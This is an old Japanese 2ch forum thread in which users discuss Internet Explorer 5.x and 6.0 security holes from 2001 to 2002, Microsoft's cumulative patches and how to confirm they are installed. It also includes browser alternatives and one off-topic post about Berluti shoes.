ＩＥ５・５と６・０、ネット閲覧ソフトに欠陥

クレジットカード番号などの個人情報が漏えいしかねない安全上の欠陥があることが１２日、分かった。

http://www.yomiuri.co.jp/04/20011113ic05.htm

IEにcookie関連のセキュリティホール
http://pc.2ch.net/test/read.cgi/sec/1005540777/

5.01用パッチも作れｺﾞﾗｧｧ

>>3
超同意。
IE5.01サポート打ち切っちゃったよ。
なに考えてるんだ！！！

なんで>>1のリンク先の記事はリンクしないで全角英数なんだろう。

------
> マイクロソフト社は修正プログラムの準備を急ぐ一方、同社ＨＰに臨時対策を掲載している。
> 詳しくはｈｔｔｐ：／／ｗｗｗ．ｍｉｃｒｏｓｏｆｔ．ｃｏｍ／ｊａｐａｎまで。

しっかし穴だらけのソフトだなぁ。

>>4
サポート打ち切っちゃったの？
5.01から乗り換えるなら5.5と6.0、どっちがいいかな？

>>7
6.0と言いたいところやけど5.5にしとき〜。
6.0は大きく変わるから結構ストレスたまるよ。
あ、sp2忘れず入れとけば完璧や。

ときにcookieにたまたまクレジットカード番号が格納
されてて悪意ある奴がうまく誘導してそれを運良く入手し
て不正使用される確立なんて宝くじ一等当選並みの確立だな。
メディアは煽りすぎ。

>>8
ありがとうございます。

>>9
SirCamみたいのが出回るとヤバい

memoMLの投稿なんだけど5.01はこのプログラム上の欠陥の影響を受けないらしい。

ttp://memo.st.ryukoku.ac.jp/archive/200111.month/1872.html

じゃあ5.01SP2のままが一番だな

>>13
前門のnimda後門のクッキー穴

nimdaはパッチがあるしクッキーは5.01系はもともと影響を受けない

>>15
本当にそうおもってんのか？
ネタだろ？ネタだよな！
ネタって逝ってくれ(w

一体、何回パッチあてさせりゃ気が済むんじゃ、ｺﾞﾗｧ

最近、ツギハギ当てるのが快感になっちゃったよ。
あっ、さっそく出てる。
ＳＰ２用とＩＥ６用のツギハギ・・・

5.01sp2も5.5sp2も、ウィルスやトロイを送り込み
実行することができるセキュリティーホールが残ってるから、
6.0にした方がいいんじゃないの？
cookieなんかよりこっちの方が深刻でしょ。

まじ？

＞１９
証拠は？
そのソースだせよ！

Pen�Tだと6.0は重すぎるのよ。

>>19
勘違いしているようだが。
セキュリティホールはセキュリティホール。
どっちがいい悪いじゃないと思うが。
まあ、M$を怨め。

修正バッチでたよ
http://www.microsoft.com/windows/ie/downloads/critical/q312461/default.asp

今、WindowsMeのIE6.0なんだけど、WindowsXPを入れたら、
もちろんセキュリティバッチ類また、入れ直しないとダメなんでしょう？

http://www.rbbtoday.com/news/20011115/5490.html


ｶﾞｲｼｭﾂですがRBBの記事です

http://www.forest.impress.co.jp/article/2001/11/15/ie_cookie.html

同社では、今回のセキュリティ問題の影響テストをIE 5.5 SP2とIE 6のみで
行ったとし、IE 5.5 SP2用とIE 6用の修正プログラムだけを公開している。
現在同社のWebサイトからダウンロードできるIE 5.01 SP2についてはサポートの
対象外とし、影響がでるかどうかは明らかにしていない。

5.01排除の動きだね。
5.5はNIS2002と相性が悪いみたいだから、いずれは6.0に変えるか。

>>22
５．５よりマシだと思うけど

IE5.5 + SP2 + MS01-055
IE6.0 + MS01-055
いまのところ、こんなけパッチしとけばいいの？

だれか、状況を把握してる人いてたら、教えてください。

>19
で、どんな穴よ？

>>30
IE5.5sp2でも、Cross Frame securityのバグが１つだけ残ってる。
そのバグとHTMLヘルプを組み合わせれば、何でもできてしまう。

>>29
ここ見て。

ttp://www.microsoft.com/japan/enable/products/security/

>>32
≠29だが、参考になったよ。

しかし・・OSの方、Win2KのSP2適用済みでもこんなにホールがあるとは・・。
WindowsUpdateには殆ど載ってなかったような気がする。なんだかな〜。

IE5.01のサポート打ち切りやがってどうしたらいいんだ( ﾟДﾟ)ｺﾞﾙｧ!!

M$=２世代サポート
M$=３世代太古の遺物

マイクロソフト、「ウソでした」
ttp://japan.cnet.com/News/2001/Item/011120-3.html

>>36
いや、嘘って言われても…（汗
文句を言う気もしないし、とりあえず「これからは気をつけてください」としか…（w

セキュリティの基本はＩＥ，ＯＥを使わないこと
https://www.netsecurity.ne.jp/article/6/3262.html
http://www.zdnet.co.jp/news/bursts/0112/06/02.html

なんだよー。また新しいのが出たと思ってﾋﾞｸｰﾘしたよ。

何でIE、OEだけ全角なのだ？

EXEファイルをTXTファイルと見せかけてダウンロードできるというのは既出？
http://www.solutions.fi/index.cgi/news_2001_11_26?lang=eng

>>38
http://headlines.yahoo.co.jp/hl?a=20011119-00000005-vgb-sci
ていうか、何使えばいいんだい？
メールソフトは別として、ネスケも以前（4.5か4.6あたり）バックドアが開くバグがあって
修正パッチが出るのまで何ヶ月もかかったんだよ。
逆に多少の事は問題にならないんでしょうね。おおらかでよい事だ（笑

>>42
>ていうか、何使えばいいんだい？

telnet　これ最強！（ｗ

>>42
Webの主軸はネスケ4.78。
少なくともMicro$oft由来のセキュリティホールの影響は受けない。
問題は一部見れない(表示狂い、または全く表示されない)ページがあること。
Mojira由来のネスケ6.2だと、ActiveXなどMicro$oft固有機能でなければほとんど
表示できるが、相当高速なマシン(1GHz以上)でないと厳しいな。

メーラーはWin95時代から現在まで電信8号使ってる。
もちろんMicro$oft由来のセキュリティホールの影響は受けないし、HTM形式で
送ることがないから相手に迷惑をかけない。
移行はディレクトリごと持っていくだけなので、マシンやディスクを取り替
えるときに簡単に移行できる。

>>43

だめだめじゃん！！

w3m
simple is best

この修正プログラムがマシンにインストールされたことを確認するためには
Internet Explorer を起動し、[ヘルプ] から Internet Explorer の
[バージョン情報] をクリックし、[更新バージョン] フィールドに Q313675
が表示されていることを確認して下さい。

ttp://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-058

>>47
これは累積って書いてあるから今までの修正パッチ入れてない人はこれだけ入れとけばいいのかな？
とりあえず新しい修正パッチage

>>48
そうみたいね。

質問なんですがwin2000でIE5.5SP2のネットワークインストールバージョンが落とせないんですがやり方ご存知の方居ますか？

win9x系だと出来るみたいですが当方NT系なのでOS入れ直し時に一々SP2のフルセット落とし直すのが非常に面倒なのですが・・

ご教授下さいませ。

>47
またＩＥ5.0が無い...
やっぱVerUPしないとダメなのか...

IE6にVerUPすると、IEの上のツールバー？などの上下が出来なくなるんだけど
これって直る？OSは98SE。

>>52
表示→ツールバー→ツールバーを固定する
のチェックをはずす。

>>53
ありがとうございます！！感謝、感謝！！

こんだけ板のTOPに貼られてるから今更だが一応。
最新の累積修正パッチ。 対応は5.5SP2と6.0のみだ。
http://www.microsoft.com/japan/technet/security/current.asp?url=/japan/technet/security/frame_prekb.asp?sec_cd=MS01-058

更新バージョンに、Q313675 が記述されればOK。

累積修正とは言っても、ＳＰ２以降の修正だからなんのパッチも当ててない人は
順番で最初っから当てないとダメだぞ。

>>56
パッチって他にもあてるのあったっけ？

>>50 IEAKという管理者キットを使うとCD-Rに落とせる。
IEAKの対応OSはWin95、98、NT4.0、2000。
http://www.microsoft.com/japan/ieak/downloads/ieak55/
http://www.microsoft.com/japan/technet/prodtechnol/ie/deploy/

>>57 IE5.5SP2、6.0に必要なパッチは、
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-051
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-055
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-058

MS製品のパッチは以下のサイトで検索できる。
http://www.microsoft.com/japan/technet/security/current.asp

>>59
３つのアドレスの「修正プログラム」のリンクをクリックすると、
同じアドレスに飛ばされるから
３つ分のパッチが含まれてるってことかな？

マイクロソフトセキュリティー情報を読んでも
何のことだか、サッパリわかりません

>>61 わかりづらいよねぇ

>>60
そうだね、リンクが以前と変わってるね。更新日は古いままだけど
リンクだけ変更しているようだね。
とすると、やはり最新の１つだけでいいということか。
>>62 禿同

http://www.microsoft.com/windows/ie/downloads/critical/q313675/default.asp
このサイトに飛んで、日本語で表示できないの俺だけ？

>>64
そこは英語のサイトなんだよ・・・

>66
warata(藁

上げ

>>65
英語でも開かない。

>>68
どうして？

>>69
http://www.microsoft.com/windows/ie/downloads/critical/q313675/default.asp
何語でGoを押しても「ページが表示できません」となる。

すいません。バッチあててから、フリーズしまくりなんですが・・
特に漢字変換の途中でフリーズします。
なぜでしょうか？
修正前は大丈夫だったんですが。

>>70
アクセス集中のせいかな、時々止まってるが一応表示できるみたい

ちょいテス

当方、ＩＥ６なんですけど、マイナーバージョンの違いで
パッチ当てられまっせん。詳しい情報希望。
　６．００．２４　だと　だめとか　対応方法とか
　６．００．２６　だと　よいとか

>>61
セキュリティー情報なので、絶対解読できない暗号が
使われているようです。（ｗ

>>75
誤訳がけっこうあるのでは？

空けましておめでとうございます、今年もインターネットエクスプローラー
並びにWindowsのセキュリティーホール＆欠陥をよろしくお願いいたします。

ここで脆弱性が解消されているかチェックしましょう。
かなり便利です。
初心者の方は特にチェックしておきましょう。
http://homepage2.nifty.com/spw/

これは脆弱性どころの話じゃないですね。欠陥製品に近いね。
IE5.01SP2のサポートが打ち切られて、いやいや5.5か6.0に入れ替えなきゃと
思っていたのにどんなブラウザーを選んだらいいものやら･･･、はぁ困った。

Netscapeはいかがですか？

実は一回入れたことがあるんですけど、ネスケ。
えらく起動が重たくて、日本語表示が変になったりしませんか？

ネスケってなーんか馴染めない。

>>82

でも、良いよ。
4.78使ってます。主にメールの方だけどね。

ネスケが重いならOperaにしておけ。

>>83
そんな古いの使っててセキュ的に大丈夫？

http://comic.2ch.net/test/read.cgi/comic/1010683340/295

今日ここを見た瞬間にエラーが発生して
エラー報告ツールが起動したんですが
なんか情報送るか送らないか言われて一応送ったんですが
後から調べるとレジストリのいくつかの設定も送るとか書いてあったんです。
http://watson.microsoft.com/dw/1041/dcp.asp

通信速度を上げるためにNetTuneというソフトを使ってレジストリを書き換えているんですが
大丈夫でしょうか？
ちなみにMicrosoft Application Error Reportingというツールのようです。

>>86
送ったものは戻らない。

まさしく

>>86
そろそろ黒服の男達が迎えに来る頃だぞ。

とりあえず戸締まりしておきます。

６．０って履歴が消えない？
マイコンピュータ削除したら他の履歴も全部消えた

>>91
マイコンピュータ削除ってどうやんの？

履歴内の一番下にあるやつです
あれを消したら、その日の分の履歴も全部消えた

>>91 IE5.5のときからそうだよ。何か都合の悪いサイトの履歴だけ消したら
全部消えることがあるね。バグかなんかと思ってたけどSP2や6.0にしてもなるね。

そういう仕様なんだ（駄目じゃんよ

ＩＥ5.01,5.5,6.0に新たな6種類のセキュリティホール。
また、その修正パッチが公表された。
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-005.asp

>96
日本語版はまだ？

>>97 出てるよ。ダウンロードのページでJapaneseを選択。
http://www.microsoft.com/windows/ie/downloads/critical/q316059/default.asp

http://v4.windowsupdate.microsoft.com/ja/thanks.asp

>>97 日本語説明ページ
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-005ov.asp

>100
上から2つ目の、
Internet Explorer のセキュリティの設定でスクリプトの動作を禁止しているユーザーでも、
スクリプトを動作させることができます。

コレって、HTML＋TIME2の事かな。。。。

IEって糞ですね

>>101
そうだよ（＾−＾）

念のため確認すると、MS02-005 の修正ってのは「累積的」だから、
MS01-058 を適用してなかった人でも、この修正パッチだけで
OK ってことだよね。

# 更新バージョン: ; Q312461; Q313675; Q316059;

Q313675; Q316059これだけでもイイってこと?

IE5.01sp2はwin2kだけ？
Mヽ(`Д´)ﾉ Sヽ(`Д´)ﾉ 氏ヽ(`Д´)ﾉ ね。

パッチあたんないすけど,,,漏れだけ？
IE5.5 SP2,Win2000 SP2SRP1
「修正プログラムはIE5.5SP2用です」なんて出やがる

>>106
でも次の機会にはwin2kの5.01パッチはもう出ないだろう。
佐々と6に変えた方が精神的にいいと思われ。

修正パッチいれたらノートンが、メール保護できませんでした。
こんなかんじにでたんだけど同じ人いる？

＞１０９
メール保護設定できてるー？確認せれ

エラーでまくり。助けてください

win98の5.01SP2だからカンケーねぇや！ｹｯ

当方、IE5.01sp2＆Win98なんだが、かちゅにしか使ってない。それでも
問題あんのかな？標準ブラウザはMozillaベースのタブブラウザ。

gnfgffgn

Q313675; Q316059

オペラ最強ってことで

115と同じなんだけど、これでいいの？

購入後、たった１年ちょいで、
更新バージョン:;SP2;Q306121;Q312461;Q313675;Q316059;

なんでこんなにツギハギだらけなんだ．．．

https://www.netsecurity.ne.jp/article/1/3949.html
また、修正パッチが必要になったな

>119
>この問題に関して、GFIではマイクロソフトに対し脆弱性を報告。
>その後、マイクロソフトでは、他の5つの脆弱性を含めた累積パッチを11日に公開している。
>今回の累積パッチでは、危険性の高い問題が修正されているので、早急にパッチを導入すべきである。

これって「修正済み」という意味ではないの？

>>119
せっかく今日、全部のパソコンに仕込んだばっかりだったのに（泣

IE6ってOutlookEx抜きのインストール、もしくはOeだけのアンインストールできないの？

IE5.5だったんだけど、パッチはSP2でなきゃ当たらないらしい。
5.5SP2にするならIE6にしてしまうべきですかね？

>>123
おパソのスペック等に相談でしょう。IE6重いって噂聞くし。いや、入れてないから
詳しくは知らないけど、ソフト板とかWin板にIE6トラブル関係のスレが結構ある
から、それ見てみれば？機能の面で現状に満足なら、sp2にするだけで良いと
思うよ。

遂に昨日、Win98での5.01に別れを告げて5.5sp2にした人間のアドバイスです。

>>124
なるほど。機能に不満はないので5.5SP2かなあ。
なんかIE6はセキュリティ脆弱だと聞いたので。
読んでみますね。

5.5＆６だとＡＡがズレてしまうのだ！
まぁ、それだけの事なんだけど・・・

>>126
モナ板のTOPからIE5.5　6　でズレない方法が書いてあるサイトに飛べる

MS PゴシックをIE5.5/6で日本語以外にも使えるようにするパッチ
http://www45.tok2.com/home/theta/mushroom/zurenai.html

IEの新しいセキュリティ・ホールを突くウイルス，情報公開からわずか3日で出現
これ自体の危険度は低いが，より悪質な新種登場の恐れも
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020214/1/

age

最新修正パッチ適用したIEにクラッシュの危険性
http://www.computerworld.jp/contents/free/200202/20020218ms.html

>>131 もう嫌だ・・・。

亀レスｽﾏｿ
>>124　ＩＥ6.0はPentiumII233MHz メモリ128MBでもちゃんと動きますよ。
むしろネスケが重くてだめだった。

>>131-132 やっぱOperaにするか…

>>134
LunaScapeどうよ?

マイクロソフト セキュリティ情報一覧で去年の１１月１２月の修正パッチの方が上に来てるね。
>>131と関係あるのかな。MS01-051を当てさせないために。
http://www.microsoft.com/japan/technet/security/frame_current.asp?sel_id=032&info=13

>>135 Thx! 見てきたよ。良さげなので入れてみるよ。

>135
ざっと見た感じ、IEのコンポーネントを使用してるって書いてあるから、
結局M$のパッチあてないと意味ないじゃん
と、思ったんだが．．．

>>136
マイクロソフトセキュリティメールによると
MS01-055とMS01-058が改定されたのは「脆弱性による影響の有無を表す表を追加」
しただけでパッチの内容に変化はない模様。
「この問題に対する修正は MS02-005 で提供されている累積的な修正プログラムに
含まれました。この問題に対する修正プログラムよりも MS02-005 の修正プログラ
ムを適用することをお勧めします。」だとさ。

>>138　そだね。Operaの方がいいかも。

>>131 の修正パッチでたようです。
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-009.asp

ディスクに保存されているファイルを外部から読み取られる可能性
対象となる製品
==============
Microsoft XML Core Services versions 2.6, 3.0, 4.0
以下の製品には、出荷時に問題となるバージョンの XML Core Servicesが、
含まれています。
Microsoft Windows XP
Microsoft Internet Explorer 6
Microsoft SQL Server 2000
http://www.microsoft.com/technet/security/bulletin/ms02-008.asp

回避策
======
Windows XP または Internet Explorer 6 をご利用のお客様
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Windows XP または Internet Explorer 6 をご利用のお客様は、"スクリプト
を実行しても安全だとマークされている ActiveX コントロールのスクリプト
の実行"の設定を無効にすることで、Internet Explorer 6 を利用した問題を
回避することが可能です。

クッキー、スクリプト、JAVA、ACTIVE-XなんかはDonutP使ってオフにしてるよ。
全てワンボタンでオン・オフできるし、グーグルバー入れなくて済むからビビら無くて済むし。
まあ、それでも当てなきゃいけないバッチはあるんだけどね・・・ｳﾄｩﾀﾞ。
OperaがもうちょっとマシになったらOperaメインにするんだけどなあ。
Operaファイト！
といいつつIEに慣れきってる俺のカラダ・・・　(w

昨日からM$からパッチ情報メールがいっぱい来てるんだけど
どれ当てたらいいんだ？＞IE6
あれって昔のセキュホールのメールも一緒に来るからわけ分からなくなる。

とりあえず、これからはパッチも人柱報告を待って導入しろ
ということだね

>127,128
今更だけどパッチの情報ありがと。
AA自作派だったのに、パッチの存在知らなかった・・・鬱だ。

しかし、2月22日のパッチは5.01もサポートされてるね。
5.01のサポートは一体いつまでだろ？

2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

MS02-009ってWin98のIE5.01用のパッチも出てるんだね。
でも、MS02-005やその一つ前のパッチには、それは無いよね。
まさか後から追加なんかしないだろうし、ワケ分からんな。

age

IE6用のパッチダウンロードして実行したら
「IE6がインストールされている必要があります」って言われるのはナゼ？
もちろん、IE6つかってるよー。

もうやだぁぁぁ!!

IE6をRESETするには、そうしたらいいの？
XP Pro使っててちょっとした理由でIE6をデフォに戻したいんだけど

パッチ当てたかage

３／２４（日）　ベルルッティのＵーチップ・ノルベジアン・クラブライン

今日は、昨日に引き続いて、ベルルッティを履きたくなり、Ｕーチップをセレクトしました。
こちらは、アレッサンドロと比較すると、見た目にもはっきりとノングノーズでポインティーなシルエットです。
足の中央部分深くの低い位置から始まるＵ型のステッチが、トゥにむけてキュッと絞られ先端でスクエアに象られていて、一層このポインティーなラストを強調しています。
さらには、アイレットも上部に２つしかなく、いかにもノングノーズなデザインでもあります。
一見奇抜にも見えますが、よく味わうと、メリハリがきいたとても美しくかつ魅惑的な靴なのです。
とにかく、芸術品のような美しい佇まいは、好きになるととことん好きにさせられる魅力を醸し出しています。
かくいう私も、このベルルッティの靴に惚れてしまった１人です。
カーキのパンツとベージュのレーヨンのシャツ、アウターは黒のワックスジャケットに合わせましたが、靴がワンポイントになって、渋くまとまりました。
濃い色めにパティーヌ（色付け）されているので、派手な外見ほどには主張していないように感じました。
（もちろん、かなりの光沢がありますし、普通の靴よりは十分に目立ちますが）
オーソドックスなタイプではなく、いかにもベルルッティらしいロングノーズでポインティーな靴を嗜むには、最適な靴の１つと思います。

家を出る時に足入れをしたらシュッと空気の抜ける音がしてピッタリと足に密着しました。
そして、帰ってきて脱ごうとしたら、伸縮性に富むベネティアンレザーの効果もあって足の上部が貼りついたような感じになって、靴を脱ぐのに一苦労するほどでした。
決してタイトフィットではありませんが、この靴は私の足に合っているようでもあり、履き心地もとてもグッドです。
ゴツい造りのノルベジアン製法の靴ではありますが、ソールも比較的柔らかくて返りもよく、靴を履いていないかのような感覚にすらなるほどです。

>>152
あいんして、マイクロソフトからダウンロド

ＩＥ６の２月２４日の修正プログラムが、上手くインストできないです。
修正プログラムをインストして、再起動するとアップグレードに失敗しましたとでます。
再度、ＭＳＮで確認するとインストされてない状況です。
駐在解除して、セキリティ中にして、プロクシは使ってないです。
ＩＥ６は修復しました、何度やってもダメです。
お願いします、原因はなんでしょう？？

>>156 2/24の修正プログラムってどれですか？　2/24付けではパッチは出てません。
2/22のMS02-009のことですか？
MS02-009はＯＳごとに別のパッチになっていますので、お使いのＯＳ（Windows98
とかMe、2000、XPなど）とＩＥ６用であることを確認してください。

すいません、２月１４日の、セキュリティのプログラムです。

↑
１５６でした、たびたびすいません。

2/12にリリースされた2/11のMS02-005ですね。
http://www.microsoft.com/windows/ie/downloads/critical/q316059/default.asp
でSelect LanguageのJapaneseを選んでもう一度やってみてください。
「MSNで確認」ていうのがよくわかりませんが…

ありがとうございます、↑のアドレスでインストールしたのですが、再起動して
立ち上げると、やはり「アップグレード更新に失敗しましたwindowsに戻ります」と出ます。
すいませんＭＳＮは、http://windowsupdate.microsoft.com/の事でした。
重要な更新だったので、インストールしても再起動して、失敗しましたとでます？
ＩＥ６のファイルが、壊れているのでしょうか？でも修復したんですが…？
原因が解りません？

>>161 OSはXPですか？そうなら管理者権限でやってみて。

Ｍｅなんですよ〜
ＩＥ５．５に戻そうかな？

5.5に戻すなら、6.0再インストールでも手間は同じですね。

ヘルプのバージョン情報にQ316059が表示されていればパッチは当たっています。
再インストの前に念のため確認してみて。

IEの画面表示速度が快適なのでIEが好きなんですけど、
いつまでたっても次から次に穴があき穴が埋まらない。
特に実害があったわけでないけど、嫌気をさして
最近はOPERAをメインに使っています。なれると便利。

IEの設計思想に無理があったのですね。
OSに密着したActiveX、VBSを、プラウザに持ってくると
外部アクセスと内部アクセスで、完全に機能を切り離していくのは難しいそう。

ハイ、Ｑ３１３６７５；Ｑ３１６０５９となっていますよ。
http://windowsupdate.microsoft.comココで、確認すると
インストールされてない事になっているのですよ？
更新履歴を見ると１０回ぐらい、「修正プログラムの完了」と記載されてます。
いいのでしょうか？

>>167
パッチ入れる順番間違えたとか。
IE5.5で昔同じことやった。
一旦IE6削除してからIE6を新規に入れなおして、MS02-005入れてからやったら、何とかならないんだろうか？

たしかＩＥ５．５で、修正プログラムインストールしましたよ。
今の状態では、完全じゃあ無いのですね？
ＩＥ６削除して、やり直します。
アドバイスいろいろありがとうでした。m(__)m

>>169
IE5.5の時の体験だから、IE6で通用するなんて断言できないよ。
でもこれ以外、対処法無いんだろうね。
後々の参考にしたいんで、作業が終わったら報告してほしい。

明日ためしてみますね、やっぱり今の状態で利用してると不具合が発生
するのでしょうか？
初めての経験なので、困りましたがやり直します。
ＩＥ６をアンインストロールして、以前のWINDOWSの構成に戻して
ＩＥ６を、新にダウンロードすればいいのですね？
時間かかりそうですね、パソコン雑誌の付録にＩＥ６は付いて要るのでしょうか？

>>171
付録CD-ROM、探したけど見つからなかった。
早く作って欲しいね。
毎回DLするのは面倒だし。

私も探しましたが、付属されてないのですね〜知らなかった。
明日すべてやり直します、なぜこんな事がおこったんでしょう？
ネット歴５年ですが、初めてです…

IEは現在、マイクロソフトの都合で5.5も6.0も一様に雑誌に掲載されてないね。
たぶん、5.5sp3、6.0sp1等に上がるまで掲載されないんじゃないかな？

どうせすぐまた新しいバグが見つかるんだから、掲載しろよって言いたいんだが。

>>174 「常時接続が普及したので雑誌付録掲載はやめた」そうなのでSPが出ようが、
掲載は期待しないほうがいいい。

＞１５６と、同じかな？ＩＥ5.5SP2で、修正プログラムをＤＬして、立ち上げたら
ＩＥに破損ファルが、あるためアップグレードに失敗しました、Windowsに戻ります。
結局ＩＥを、アンインストして、再度やり直したのですが、結局上と同じ結果に。
パッチが重複してるから、上手くいかないのではと、言われました。
次にＩＥ６を、ＤＬしたらファイルが破損しててＩＥは起動しません、又アンストして
ＩＥ５．５に戻しました、結局面倒くさくなったし、嫌になったので辞めました。
別に修正プログラム入れなくても、問題ないかも…
マイクロソフト逝ってくれー

ＯＥでＨＴＭＬを編集して文字を動かしたりする機能が
灰色の画面だけになって全く使えなくなってしまいました。
削除して再インストールしても直りません。ウイルスの感染等も見当りません。
何が原因なんでしょうか。

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
の日本語版パッチが一部リリースされた。
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

>>178
IE6入れてるんだけどmsxmlというファイルが見つからないんですが
入ってないバージョンもあるんでしょうか？

ファイル名 問題のあるバージョン
msxml2.dll 8.0.6518.1 以降
msxml3.dll 7.50.5108.0 以降
msxml4.dll 4.0.9004.0 以降

>>179 c:\windows\system32　か　c:\windows\system　の中にないか？

IE6なんだがＱ３１３６７５ってどこにあるの？
Ｑ３１６０５９は入ってるんだが

>>131
もういれちゃったつーの！！
やってくれたなＭＳ

>>181
2001年12月13日 Internet Explorer 用の累積的な修正プログラム (MS01-058)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS01-058
「この問題に対する修正は MS02-005 で提供されている累積的な修正プログラムに含まれました。
この問題に対する修正プログラムよりもMS02-005 の修正プログラムを適用することをお勧めします。」
Q316059が入っていればQ313675は不要。２００１年１２月１３日から２００２年２月１２日の間に
MS01-058が必要だったが、MS-02-005が出た以降は不要。

2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

>>183
なるほど。じゃあこれでいいんだね

今の所は

昨日は、アドバイスありがとうございました。
＞１８３を見ると良いみたいですね？

>>186
結局どうなった？

結局、ＩＥ５．５に戻して、ＩＥ６をＤＬしたのですが、修正プログラムが、インストール
出来ません？結果は同じでした…
仕方ないので、今の状況で使います。

↑
１８６です、すいませんm(__)m

>>188
これと似たようなものなんだろうか？
http://support.microsoft.com/default.aspx?scid=http%3a%2f%2fwww.microsoft.com%2fisapi%2fgomscom.asp%3fTARGET%3d%2fjapan%2fsupport%2fkb%2farticles%2fJ070%2f1%2f39.asp

http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009
これが適用されたかどうか確認するにはどうすればいいの？

”サポート技術情報 Q318089 の修正プログラム欄”てどこにあるの

IEのヘルプからバージョン情報を参照。

はぁ？

>193 態度わりーな。ついでに頭も(w

Internet Explorer の不正な VBScript 処理により Web ページがローカル
ファイルを読み取る (MS02-009)

この問題に対する日本語版 KB を公開しました。次のリンク先をご覧下さい。
http://www.microsoft.com/JAPAN/support/kb/articles/JP318/0/89.asp

>>192
5.50.4807.2300;SP2;Q313675;Q316059;Q318089
のようになるっちゅうことでございますか？

DOWN版
ここで
http://tmp.2ch.net/test/read.cgi/download/1014904195/
祭り中
はやすぎます

修正プログラム(MS02-009)が正しくインストールされたか
確認する方法 :

各ファイルを確認するためには、サポート技術情報 Q318089 の
修正プログラム欄を参照して下さい。

だってさ。わがんねー。(;;)

皆さんも困ってるんですね(^^;
どうしたものか、、、

とりあえずバージョン情報のとこには”Q318089”は加わってませんです

200get!

>>199　パッチ当てたのにQ318089がバージョン情報にないの？変だね。
オレの周りでは、6.0も5.5SP2も当てたものにはQ318089が表示されているが。

スマソ！MS02-005のQ316059と間違えた。Q318089は表示されてませんです。
逝ってくる…

オレのIE5.5バージョン情報。
:;SP2;Q306121;Q312461;Q313675;316059

パッチが出ると当てていくって感じで、MS02-009も当ててます。
さぁドコまで伸びるか、バージョン情報！

恥かいたので、調べてきました。
＞各ファイルを確認するためには、サポート技術情報 Q318089 の
＞修正プログラム欄を参照して下さい。
とは、http://support.microsoft.com/default.aspx?scid=kb;EN-US;q318089
にある、
The English version of the Internet Explorer 6 for Windows 2000 and Windows XP update should have the following file attributes or later:
Date Time Version Size File name
--------------------------------------------------------
06-Jun-2000 15:43 5.50.4134.600 92,432 Advpack.dll
18-Jan-2002 16:31 1,537 Vbs56nen.inf
02-Jan-2002 13:08 5.6.0.7302 467,002 Vbscript.dll
06-Jun-2000 15:43 4.71.704.0 2,272 W95inf16.dll
06-Jun-2000 15:43 4.71.16.0 4,608 W95inf32.dll
The English version of the Internet Explorer 6 for Windows Me, Windows 98, and Windows NT 4.0 update should have the following file attributes or later:
Date Time Version Size File name
--------------------------------------------------------
06-Jun-2000 15:43 5.50.4134.600 92,432 Advpack.dll
16-Jan-2002 15:04 977 Vbs56men.inf
02-Jan-2002 13:08 5.6.0.7302 467,002 Vbscript.dll
06-Jun-2000 15:43 4.71.704.0 2,272 W95inf16.dll
06-Jun-2000 15:43 4.71.16.0 4,608 W95inf32.dll
のことですね。各ファイルが上記のようになっていればMS02-009は当たっている、と。

上記のは英語版で日本語版とファイルに相違がありました。日本語版は↓（2/28リリース）
http://www.microsoft.com/JAPAN/support/kb/articles/JP318/0/89.asp
Windows 2000 および Windows XP update 用の Internet Explorer 6 アップデート (日本語版) は次のとおりです。ただし、これより新しい修正プログラムがリリースされている可能性もあります。
日付 時刻 バージョン サイズ ファイル名
--------------------------------------------------------
2000/06/19 18:00 5.50.4134.600 92,432 Advpack.dll
2002/01/21 11:42 1,608 Vbs56njp.inf
2002/01/02 13:08 5.6.0.7302 467,002 Vbscript.dll
2000/06/06 15:43 4.71.704.0 2,272 W95inf16.dll
2000/06/06 15:43 4.71.16.0 4,608 W95inf32.dll
Windows Me、Windows 98、および Windows NT 4.0 用の Internet Explorer 6 アップデート (日本語版) は、次のとおりです。ただし、これより新しい修正プログラムがリリースされている可能性もあります。
日付 時刻 バージョン サイズ ファイル名
--------------------------------------------------------
2000/06/19 18:00 5.50.4134.600 92,432 Advpack.dll
2002/01/21 11:39 992 Vbs56mjp.inf
2002/01/02 13:08 5.6.0.7302 467,002 Vbscript.dll
2000/06/06 15:43 4.71.704.0 2,272 W95inf16.dll
2000/06/06 15:43 4.71.16.0 4,608 W95inf32.dll

パッチが、弾かれてうまくアップデート出来ないのは、何処に苦情言えばいいのかな？
私も、ＩＥ６の修正プログラムが、インストール出来ません。
上の方で、同じ症状の人が居たけど、どうにもならなかった見たいですし。
２月１４日の、修正プログラムです。

ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020301_ie

IE6アンインストールして、IE6→MS02-005→MS02-009を入れてみた。
再現できた。
